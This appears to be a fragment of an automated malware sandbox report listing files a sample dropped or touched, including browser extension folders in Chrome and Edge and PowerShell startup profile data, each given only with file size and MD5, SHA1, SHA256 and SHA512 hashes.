SHA256fad56011910b792dc6e057f9e7dfb89e4342aeeaf260e098f67008b68a3bd04f
SHA51205f6ad93d95f96b66a78be5fe722d3baf938f90a2d123eae72ddcaf790235630f7aec495ddd3e42d9aee0ccdda0c724520d5db1007fc5aad1302ae3fc9452003
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\icons\icon-16.png
Filesize654B
MD5116154520a5241b455f08fd7bc29e99d
SHA14c7155fc19637b5bb919100a8123cebc202a3b87
SHA256a5571a0623564757d45d625ca56b07bec2e32e19b058b9f43e93fbe4e2c2d589
SHA5122f5acadf261c7cce1e1b71ee6b8cccbd5a19009a90a06c37f9335c819a06988c78c4efef3a3bc196de67ece4e18dcfa508a6fc4a0016822be40f45f4b456a9c2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\icons\icon-32.png
Filesize1KB
MD5bb05c2b0dd4612d0ab94e353c80f18e4
SHA17f1a14339b08c6140a4e5543479382adfb0d09d8
SHA2565ec71ad6b7058183a4a1e46ef570213e9450e3173bb7809365a0c66bf7e2b61b
SHA512f143cf26e308679bda02abd1a5ec9330be6d33cd7b2317e6ae695bdf7ba88da5d25d54e772777c27302ddae60532017d493d823c8c209cda44917ee7b482b5d3
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\icons\icon-64.png
Filesize4KB
MD5b4d4e7bad349bf3cc49cf75d41df7e58
SHA166a6f348a1e1bbf963208b08a5285ab231e1ed1f
SHA2564fe78885932758161092d3c1d22843cdfcbfa92a546d155ce2887a176d1fa319
SHA512f1a8c206501cfdc0644dc5975ac202e99c8dc1643180374297e1d9c9b9358e256fbeaca5bc77b142e70db3bb03f3ad8d674bfe6820e26cb76de177f9e9c21fd0
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\2.0.0.3_0\1.0.0.0\manifest.json
Filesize1KB
MD5b7cdcfb73e8696887df4adbb2dfb0a71
SHA14887cdb7ce54d8db677e7a0e118fad92b6b9710c
SHA2563ff8b96d52762ab4b9799c0195f4dccb80216f5b03a54999c1d343fc63e8ea15
SHA5121eb151ba80d23b37e2043c5100375957b75c13a337d051018766f88653d39bf779b5cf6fa8b49546c1b1d5dce4c3f2558348f5f63fe9009f719088a7338c96a0
-
Filesize
2KB
MD5ac4917a885cf6050b1a483e4bc4d2ea5
SHA1b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f
SHA256e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9
SHA512092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\en_TO\messages.json
Filesize2.0MB
MD5b27704a9a86f7997c371282454e20d01
SHA1b9c300a00191191686bcfe2ae1356b68935d939a
SHA256acd4704aa755c42f888c7e2da8ae51772be14312893def5e42663180fcc62d3e
SHA5125672c32d2f1fdb6eb402c2e7909e37b4eef4512d22e4168ae37f7fd5c9510780f1117f06e2da1116c4d4d0e3e27038b987e3cccce9cc079d5d1cb48ae6f2dfb3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\manifest.json
Filesize758B
MD5fc1014742ae6347954f0ececdf6e9997
SHA17681d05b7dab21959099c5a1a0a8d8014b130da0
SHA256d8d040c8c63416378ca287fb7bc13ebaeaac5b4b5e938951b4e3e9592d56bbd1
SHA512f71efea4e1375d63f12c3963255ab57d93ced90ae7918d093fc5dce34459d7fd6505ad4749fcccc21ba99a1fbe71ef8f311a3cf8ecae8ed75a7bd65c544e7988
-
Filesize
20KB
MD545755ba30a751b777e9eae93a2b30711
SHA17b093559697feeca90f3bdc4c3356db28c328845
SHA2565b0f06cbe89edfbc9090b2494db559c9028ac77ec167e48d44171ee07f2c8cb3
SHA512cbedca41de27d28fda8b77b4f148267be379af2021ccb796f56022a261513cf6d7ce16ff0713be9bbb79d13fd4525987c9a22499f9a6893d8cf8feb779d9f9fb
-
Filesize
20KB
MD5aa5b7a38195ef72765bbd655c0113bc0
SHA1f093ae44a81062fbb6588a8625137897af57455d
SHA256eddd45c3adf51d11508b0f170b404d93707179d4e4c719321ce50e63f51f48b8
SHA51214305ef8f5b268c6eed13e835e21ed7c913687cb85309c615479cdb12f53001e5ccac32b872bfb3eb91fc5c802da1cf8536e3d4f30585cc15730f1222c65bb98
-
Filesize
1.8MB
MD5b86babc65fdc316a10b953fc33dcc1aa
SHA196a99ca112abecb80b4de4b23035cbeca95954a7
SHA256a25add458dd5f3d5ea3b8464b19a9a9100a10d58e47f5f0c9e88bfc65052f241
SHA5126a618b6e57111392a9d2c99ca5a8757694bcb46d41bdb79aeb7c66dfa6c326158b9a7c87f6f6a21a0ff87b7e01574cc3343fa48fc4eaa91d51e12ed32dd6decb
-
Filesize
30.6MB
MD533787bb1279b90b829281fadd9842da7
SHA1232be73341f6211f20e289fde16988790f62fe33
SHA256a94db0a466893661cb536296f2f12ca0799d6fc796829584f5141ad0adee3fcc
SHA512863edf4d9aafa7cea85e663dd0d6435137fd2ebc76cc8221b38dd7155d715e563d3502faba6a6858afbef2898cb44924b53ea71793ac90125004e79985a4419d
-
Filesize
418KB
MD50099a99f5ffb3c3ae78af0084136fab3
SHA10205a065728a9ec1133e8a372b1e3864df776e8c
SHA256919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA5125ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6
-
Filesize
386KB
MD5258e2128803910f3b69a21d5bae342c4
SHA1fa9bb27e5804e43b268f063b69d40d8b9d6e05fc
SHA2567954fe796c7bdfd2286b9c29349d8f349f02a0cb53e19bb5bbeaef65108f9e33
SHA51203027a8add75e227870f8db62472807709c7343be3376b8791c38c94a2f6a22859da21c6c2672e65a6ca1e9e697a6c63d094b1d03ff7ad150c1f52ff31cbcd42
-
Filesize
6.4MB
MD5220a02a940078153b4063f42f206087b
SHA102fc647d857573a253a1ab796d162244eb179315
SHA2567eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60
SHA51242ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa
-
Filesize
44KB
MD52f82623f9523c0d167862cad0eff6806
SHA15d77804b87735e66d7d1e263c31c4ef010f16153
SHA2569c2c8a8588fe6db09c09337e78437cb056cd557db1bcf5240112cbfb7b600efb
SHA5127fe8285e52355f2e53650dc4176f62299b8185ed7188850e0a566ddef7e77e1e88511bdcf6f478c938acef3d61d8b269e218970134e1ffc5581f8c7be750c330
-
Filesize
122KB
MD5ee0f08f2b1799960786efc38f1d212d5
SHA1c6708b30c974cd326ea540415bae0666d6a0780a
SHA256c6929b7dd7ead3bddb12f3fb953602464c426425a354ce7ab0b77cc53f696a36
SHA5128cc5aca4db093884a47d31243f1278c0e2360bed6b6cbec6d7dd7ac1170f05f3bd0493a04ef59cd93fb16836b4785f9ffa0e7ebdd45b085244c58fe1fbbcca67
-
Filesize
1.8MB
MD544f6004630007026ed35d9037f3d447d
SHA179922204b4741197dfb045f6243f8d4abf7b655d
SHA2562fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5
SHA5126aaaa94f531c410a506b30a93b338ff97f5e066618898a5225ab1825f6da030a6ba41838501f0e94269daa13bcf7789f21b8699d01b3fdad4688f0d07544a641
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
20KB
MD5e5715583f80cabb8d96141c2e5f1054b
SHA18a99faf0188e32c55032f09cc76a95da486b1d2d
SHA256bd2158f444bb7170f851b093082b2f4c5771a117b79823d5faccdf7c4b379bfb
SHA5128e884b460296e99314efb381895aec806b1a13deece08624ead1b576a9becc77c0cae769eeba755437387837abdebda5efba64ce0e62c2b72c5fd09c97571961
-
Filesize
2KB
MD56b296207b17499c23160d3d49f789211
SHA16da4f981f087238b65097d7e65d479fbe21fb6ce
SHA2567fa3a74d339c8659558f9dd19175a002cccac2633b2e11f3e63eb87e22d7a593
SHA512abb504b8b897623ada294ed9ae340efc22c24bc33ae90b4c0c784bd38379e55af8714b3942ee30f6f1018ca321d0ca322a675cd457f868ffe63d3f8ce1413b5e
-
Filesize
3KB
MD55d4e652b15b8be75c7eda14f66026430
SHA11c75bf872abed0e7adfea01b45ea724c3f186a1f
SHA256a63f571e1f667fb107f077fba073655654bfeb4881309eaea97f139532b63a65
SHA51287349cdc3fb2636c324f9427904848f80352e0799488024e24e6ed752facf246ba4202aa3ff21d9951f5a175597fc4b3667ab82f63cc9ba5d2c8a9c39340b1f7
-
Filesize
3KB
MD5a23658ed59d6d54d91de7fb21f21c39d
SHA1ed8f524c48acc9af9a57c3d8a9c7df40b529c047
SHA2564a086310c0db0e6fae9eb23e8da19d5b5cfa658736cdf215d62cebe311c2813e
SHA5126a79df2639e4ff5e4ef389c0dcad3a4f0528b893fff0df22181dbdc1f6c87794864fb9799d1a22868ec5fbc916a87b12c50b40176e721feddfa5b6298dd7ad22
-
Filesize
4KB
MD5d573360cf33ca04acb582fb39b1cb30c
SHA1bc1fdcf3f916112a0657544b8c5b21c8e89739d5
SHA2562ac73cc06da63bdaf0f3e2250c524fca037d1f75d3e6b1849f42fe6c5d0d84ff
SHA512792f6f398b5a8fee54c5c280ff4eb15345491702ab5821f60221ac7b55a66028e5aa740cea719b52d0df6d25f101837c2dd8f7ff3983b850e289a33ac81baf5e
-
Filesize
238KB
MD51f249241805d47175dfb55846df09485
SHA166407ab1cf48a4a56a28820c7bfc820a228a2ba3
SHA256736af94a2fd07dca7397c2b2068bfd1e2a71a716c5ddda5e9cb7da808355487a
SHA51299808d4e4ef7d2fa99efeb9240b8ec73e6f0206e0ddcf8f72caee4276a98034b9c9eac554e0228adc898b0e8ececdd52fd5d30a164fe66a63fadae61e53df628
-
Filesize
4.6MB
MD5397926927bca55be4a77839b1c44de6e
SHA1e10f3434ef3021c399dbba047832f02b3c898dbd
SHA2564f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954
-
Filesize
7KB
MD5f215072cd0bad138941cbdb04a8e8bd7
SHA1b75aac0c011ae8c3249c8dcc54cb72c99389489c
SHA2564623c84d7dd21e798abbba3e015bbeb1664dc8ba02ea7175c5434af44ac4b4c1
SHA51204527032a8afbca35fcff21c355baa503b7ccf323289ac4813923d095cba2983620fa7238cdcf1a107ba0886c4adc70f7c4a6e8e50562c2c3d0769043bc136f3
-
Filesize
6.2MB
MD55cc472dcd66120aed74de36341bfd75a
SHA11dfc4d42da90fe070d4474ddd7fa7b6f6ffa97ab
SHA256958dd14c90b1c73852f926608f212377aa3a36666c04024f97c20deb375e9773
SHA512b5cf358d95ec9a6cca81d2e9c23f0ede93ab94963bb5c626f4e6233a06cedae63b73dd81d2455acb29b003c3b4e2f54da6010daebc4639a3dcc54314d4fe4f81
-
Filesize
386KB
MD50513304ac8178fa00bce7b395fa824d0
SHA1a10f045ae42a32cc223fb81d121a074f1cfb6085
SHA25608acad39a18e3a380043252aaa097232c57f3e1b0e587d4fb88351b28698f942
SHA512039619a83b493790bc47010daa09f657a597009a77d7639b22a37346ce9fb6fce83e906f4a68cc6575a33d9ccebe8cd1662d856de3c32cfe7c235316c4f39e9a
-
Filesize
4.1MB
MD57d797466a9c8f0f995a01e75f83f5104
SHA135c1a21693577f713ef4292902190a5eaf11479c
SHA25692321d87b7dab27ced4c85a894b199d02d14c7005ec5e6729abf5e5d81807d9f
SHA512bee594a02a130314f2338e51e943670001b97c3d164739994ec7447dcb257a195052b73744f4c98db8276637d690a6246e17c43a96e9d88fca99568da3eef80a
-
Filesize
7KB
MD577f762f953163d7639dff697104e1470
SHA1ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499
-
Filesize
4.1MB
MD5abc8de7ab67111f1a11e0f56fa064a17
SHA10d6481e34d595b38762497f24917d6f36db1a1e3
SHA256c06e1787c9443a978d92d1ffa2a029b3f675a4553586b82da896b0580abdacda
SHA512b0debe776a64f2132a057e7a07c1593810bb849db403a3bf9244b9b3fe73f32c3a2154c34751f63be09e07b359764fad31362a249040a24f548e82f5817b7789
-
Filesize
1.4MB
MD5411602e57a0df5f835f74066f38bc84c
SHA17207ef4fbc5ae0145c3dbcd10d8cdb1b22287c30
SHA2562f1e42016a3f2cfa0817f49ebd0e765c07d87b4692a14df7c8b38232422060ff
SHA51287bd2b7770462a17368ab3a3278c3f3ef6bf873e6b2c83179025ad348730f14ced5461ab0a6ebf81236ec83c2c1eef0faf73479a6d40ad9ed198e9c3011eaa7d
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize19KB
MD51989007b3e7dda29648baf23a2749e2c
SHA1c57a368568536ca6c7788f35cab7014d0a41a976
SHA25666a67c24e53f9457084567e52b6ffe6a924674506dff854fbae81c3c16942814
SHA512a3411b42ef45699e14170030f3ab6f1c93c850b8d2d110e66d93040168e2e9ccfc3fb4e097205852bb688e1f6deaac2ffe5189fc0fccf93b31de47528153d876
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize19KB
MD5ff78c61a7466cced1d16695a00a3f57b
SHA18e514db2baeba6e7d4e72c77b728caf4596ccfe5
SHA256570b840b6aff2b819c979dc5fb2e7d81761bbd15b09fde7c54961d9859067cab
SHA5128ce4ec21ee7848450864d464ff70c4de2f0ab3ee2f64294ca3fa7ae7264272f041db66f930d8466964173d85f29b41b9e749f26916608ac414f0af0573190d00
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize19KB
MD5dbcd97d20892e008fab98e4ed94bd8d5
SHA14feffca6f588baf88041a5803e9892724b1fb007
SHA2567e2911c7719979ccdff26f54d775c9a79be7c1597f41b967d41909f145ae8c81
SHA51258320abbef9530e60749a8e1fb2d2329572390a047f87be4e0c6a3a9697ef28a65bf371f83644d24e812840b49e55cc5d786dcd5ac6c493640cce9b5c7676f1f
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize19KB
MD55dd224e918ed582cc2f6d553d5f5273c
SHA194c72f195e00c17b65a3e0631c0b0bf407e2fc4d
SHA25622bf952edfd6a83f90aff9d74f26b27109dcbdeb640b38794a7d2319579aa827
SHA51260f0c639380952c18ce0d3aa180e554bc19395d52e855850c4992055c9c0ca9767ebb5ab02cc3ee62d7b4bb3e4b6e87b6c423400490671762355b847cd8fa5ef
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize19KB
MD57b186e57e143c009f0104b7f30ea2189
SHA134f171dc852cc3dc3ac3c6870010cd38c86e769b
SHA2567641ad18c3af2bffde1ec1c3a4f9b38ff813f31767a047fab0a262be4e3f9dc6
SHA51298977ca35bbea8365e0d524d6fe11b0eeed982f8874124c70e87d765fce35a5688a0b03e3b869de8d4e2d4b4447a6feb09007950f75fe55959238651bca8d4fa
-
Filesize
127B
MD58ef9853d1881c5fe4d681bfb31282a01
SHA1a05609065520e4b4e553784c566430ad9736f19f
SHA2569228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA5125ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005